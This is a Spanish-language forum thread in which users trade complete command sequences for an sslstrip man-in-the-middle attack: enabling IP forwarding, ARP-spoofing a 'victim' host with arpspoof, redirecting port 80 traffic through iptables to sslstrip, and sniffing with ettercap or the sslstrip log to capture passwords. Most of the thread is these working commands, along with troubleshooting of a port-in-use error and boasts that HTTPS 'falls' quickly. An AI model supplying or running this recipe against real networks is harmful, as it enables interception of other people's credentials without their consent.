Hola compañeros, estoy haciendo mis pinitos con el sslstrip, hago los siguientes pasos:
Shell 1:
cd '/home/anonimous/Escritorio/sslstrip-0.4'
python setup.py build
python setup.py install
Shell 2:
arpspoof -i wlan0 -t 192.168.1.33 192.168.1.1
Shell 3:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l 1000
Shell 4:
sudo ettercap -Tqz -i wlan0
La primera vez que lo probe me funciono, pero despues me devuelve este error, y no entiendo su significado.
Traceback (most recent call last):
File "/usr/local/bin/sslstrip", line 256, in <module>
main(sys.argv[1:])
File "/usr/local/bin/sslstrip", line 246, in main
server = ThreadingHTTPServer(('', int(listenPort)), StripProxy)
File "/usr/lib/python2.6/SocketServer.py", line 400, in __init__
self.server_bind()
File "/usr/lib/python2.6/BaseHTTPServer.py", line 108, in server_bind
SocketServer.TCPServer.server_bind(self)
File "/usr/lib/python2.6/SocketServer.py", line 411, in server_bind
self.socket.bind(self.server_address)
File "<string>", line 1, in bind
socket.error: [Errno 98] Address already in use
Haber si alguien me puede ayudar.
Gracias de antemano.
Citarsocket.error: [Errno 98] Address already in use
Ya hay un socket abierto y escuchando en el puerto donde intentas crear el nuevo, mata antes el proceso del que depende el socket, para saber cual es:
# netstat -aveptn
o corre sslstrip en otro puerto (y tambien debes cambiar la regla de iptables para que redireccione a ese otro puerto=
saludos
saludos, te pego el codigo con el que yo funciono y he auditado mi red, a mi me funciona de maravilla
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
nmap 192.168.1.1-254
..... en otra shell .....
arpspoof -i [interfaz] -t [ip victima] [ip router]
..... en otra shell......
python sslstrip.py -l 10000
.... en otra shell....
ettercap -T -q -i [interfaz]
espero haberte ayudado y si te ha ido bien, comenta
saludos
El segundo problema que veo con el sslstrip. alguien me puede explicar porque usan ettercap con arpspoof????
porque yo no le veo el caso!!!!!!!!!!!!!!!!!!!!!!!!!!!
para hacer un mitm :) o sino como te va a enviar la victima los dateles? xD
Cita de: tragantras en 26 Septiembre 2010, 21:36 PM
para hacer un mitm :) o sino como te va a enviar la victima los dateles? xD
mmmm..... pues mira que usando solo el arpspoof haces el MitM :silbar:
o usando solo el ettercap haces tambien el MitM por eso digo que no veo la necesidad de mezclarlos...
o hay algo mas detrás??? explícame que esa es mi duda...
a vale vale, no entendí tu pregunta
sudo ettercap -Tqz -i wlan0
-T -> modo texto, no interfaz grafica
-q -> quiet, no hace print de los paquetes capturados
-z -> no hace el arp scan buscando hosts
-i wlan0 -> interfaz wlan0
es decir, el ettercap se utilizará como sniffer... no se hace el arp spoof mediante él
http://linux.die.net/man/8/ettercap
ok... ya entiendo el uso del ettercap en este post... pero bueno aun así no veo la necesidad de usar el ettercap.
Yo uso solamente el SSLStrip con el ArpSpoof y me funciona de maravilla. Las https caen enseguida :laugh:
claro, porque tu usarás otro sniffer, como el wireshark o algo así!
Cita de: tragantras en 27 Septiembre 2010, 16:51 PM
claro, porque tu usarás otro sniffer, como el wireshark o algo así!
No mi bro... yo no uso otro sniffer.... has pruebas si quieres.... sólo iptables + arspoof + sslstrip
Saludos! ;D
jajajaja, si yo no estoy diciendo k no funcione así, pero como consigues ver las passwords si no usas un sniffer? por arte de magia seguro que no xD
@tragantras:
que yo sepa sslstrip trae code para poner un filtro de captura a bajo nivel .. O sea, si le pasas la opcion:
#sslstrip -w [archivo de captura]
tendrias ahi los resultados de la misma sin usar un sniffer de terceros.
Quizas me confunda,
Un saludo.
root@bt:~# sslstrip -h
sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
touché xD
Por que cuando uso estas aplicaciones en mi red, se cae el internet y es muy dificil volver a conectarse??? Saludos
Tienes que redirigir el tráfico de nuevo.
Desde una consola, pon:
echo 1 > /proc/sys/net/ipv4/ip_forward
Si como dice PyRos no te compliques porque no es nada complicado.
Ip tables para redirigir el trafico a otro puerto y asi esnifarlo.. Poner en el sslstrip ese puerto y ir enviando paquetes arp engañando tanto al router como a la ip victima con arpspoof.
Luego hacer un tail -f del log de sslstrip y listo.
En principio deberia funcionar, aunque deberia activar ip_forward a 1 o con fragrouter para asegurarnos que la victima no se keda sin internet y que los paquetes lleguen correctamente.
Saludos!!